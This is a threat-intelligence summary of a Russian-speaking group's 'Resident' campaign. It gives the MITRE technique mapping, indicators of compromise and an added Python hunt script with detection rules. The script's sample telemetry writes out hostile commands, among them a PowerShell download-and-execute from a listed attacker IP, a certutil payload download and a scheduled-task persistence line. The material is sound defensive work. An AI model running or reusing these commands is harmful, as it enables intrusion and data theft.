eSentire’s Threat Response Unit tracks a Russian-speaking threat group behind a campaign named Resident, targeting manufacturing, commercial, and healthcare sectors with backdoors, Cobalt Strike loaders, and the Rhadamanthys stealer. The operation spreads via phishing and drive-by downloads, dropping MSI installers and memory-resident payloads across four incidents, and leveraging various LOLBAS and scripting techniques to exfiltrate data. Hashtags: #RhadamanthysStealer #ResidentCampaign
Keypoints
- The Resident campaign targets manufacturing, commercial, and healthcare sectors across four incidents.
- Initial infection vectors include phishing emails with PDFs and drive-by downloads from compromised sites.
- The campaign drops backdoors and Cobalt Strike payloads, often via MSI installers, and uses script-based loaders (JavaScript, VBScript, PowerShell).
- Rhadamanthys stealer is deployed to exfiltrate system data, browser credentials, crypto wallets, and related artifacts.
- Case studies document extensive file drops (sdv.vbs, Imdb.vbs, index.js, resident2.exe, etc.) and multiple C2 communications.
- Technical techniques include in-memory payload loading, API hashing, RC4/base64 obfuscation, and LOLBAS usage (shell32, certutil).
- eSentire TRU proposes detections, threat hunting, and mitigations (EDR, PSAT, Attack Surface Reduction) to curb Resident and Rhadamanthys.
MITRE Techniques
- [T1592] Gather Victim Host Information – The script queries WMI for active processes, OS details, and system info. Quote: “the script uses WScript.shell object to query the Windows Management Instrumentation (WMI) for information about active processes, caption, command line, creation date, computer name, executable path, OS (Operating Systems) name, and Windows version.”
- [T1566.001] Phishing – Initial delivery via phishing email containing an attachment. Quote: “The initial infection vector we have observed is a phishing email.”
- [T1059.007] Command and Scripting Interpreter: JavaScript – Initial Resident payload is written in JavaScript. Quote: “Initial Resident payload is written in JavaScript.”
- [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell-based payload retrieval/execution. Quote: “malicious PowerShell command mentioned before retrieves and executes the PowerShell script from 31.41.244[.]142.”
- [T1053.005] Scheduled Task/Job – Persistence via a scheduled task (RtlUpd) running at 10-minute intervals. Quote: “persistence is achieved via a scheduled task named “RtlUpd” that runs every 10 minutes starting from the time when the binary was first executed.”
- [T1547.009] Boot or Logon Autostart Execution: Shortcut Modification – Startup shortcuts establish persistence (CUGraphic.lnk launching AutoHotKey). Quote: “CUGraphic.lnk (Startup persistence) – the shortcut is responsible for launching the AutoHotKey script under ProgramData2020.”
- [S0154] Cobalt Strike – Resident deploys Cobalt Strike on infected hosts. Quote: “Resident deploys Cobalt Strike on the infected hosts.”
- [T1113] Screen Capture – The stealer tools capture screenshots of the host. Quote: “The backdoor… take a screenshot of the host.”
- [T1106] Native API – The loader uses API hashing and maps APIs at runtime. Quote: “The loader uses API hashing, shown in Figure 12.”
- [T1027] Deobfuscate/Decode Files or Information – RC4 encryption of strings and data. Quote: “The strings in the binary are encrypted with RC4 (Figure 21).”
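As an added hunt example (not code from the eSentire report), the scheduled-task, PowerShell, certutil and script-host observations listed above turned into rules that run over constructed process-creation events; the command lines and paths below are assumed sample telemetry, not artifacts captured in the four cases.

```python
import re

# Constructed sample telemetry (not from the report): one process-creation
# event per entry, in the shape a Sysmon/EDR hunt query would return.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /tn RtlUpd /sc minute /mo 10 /tr "C:\\Users\\Public\\resident2.exe"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://31.41.244.142/update | iex"'},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://62.204.41.155/x.bin x.bin"},
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript C:\Users\user\AppData\Local\Temp\sdv.vbs"},
    {"image": r"C:\Windows\System32\schtasks.exe",   # benign control event
     "cmdline": 'schtasks /create /tn BackupJob /sc daily /tr "C:\\Tools\\backup.exe"'},
]

# Hunt rules derived from the report's observations: (name, image regex,
# command-line regex). A rule fires only when both regexes match.
RULES = [
    ("RtlUpd scheduled task with 10-minute interval", r"schtasks\.exe$",
     r"(?=.*/tn\s+RtlUpd\b)(?=.*/sc\s+minute\b)(?=.*/mo\s+10\b)"),
    ("PowerShell contacting Resident loader IP 31.41.244.142", r"powershell\.exe$",
     r"31\.41\.244\.142"),
    ("certutil used as a downloader (LOLBAS)", r"certutil\.exe$",
     r"-urlcache\b.*?\bhttps?://"),
    ("Script host launching Resident VBS names (sdv.vbs / Imdb.vbs)", r"[wc]script\.exe$",
     r"\\(sdv|Imdb)\.vbs\b"),
]


def evaluate(events):
    """Return (rule_name, cmdline) pairs for every event that trips a rule."""
    hits = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1]        # basename only
        for name, image_re, cmd_re in RULES:
            if re.search(image_re, image, re.I) and re.search(cmd_re, ev["cmdline"], re.I):
                hits.append((name, ev["cmdline"]))
    return hits


if __name__ == "__main__":
    for name, cmd in evaluate(SAMPLE_EVENTS):
        print(f"[HIT] {name}: {cmd}")
```

The benign daily BackupJob task is included to show the RtlUpd rule keys on the task name and the 10-minute trigger, not on schtasks use alone.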
Indicators of Compromise
- [MD5] – Example file hashes tied to observed artifacts: sdv.vbs (0e5598b0a72bf83378056ae52be6eda4) and screen1.pyw (a628240139c04ec84c0e110ede5bb40b).
- [MD5] – Imdb.vbs (c3f9b1fa3bcde637ec3d88ef6a350977) and index.js (5bdb1ac2a38ab3e43601eee055b1983f).
- [MD5] – Resident2.exe (6e1cdf38adb2d052478c6ed8e06a336a) and 7765676.exe (f199b4ef3db12ee28a05b74e61cec548).
- [IP] – 31.41.244[.]142 (PowerShell loader site) and 62.204.41[.]155 (Cobalt Strike payload host) and 62.204.41[.]171.
- [IP] – 85.192.49[.]106, 89.107.10[.]7, 79.132.128[.]79 (C2s/domains referenced in cases).
- [Domain] – saprefx[.]com (landing domain hosting JavaScript payloads).
Read more: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign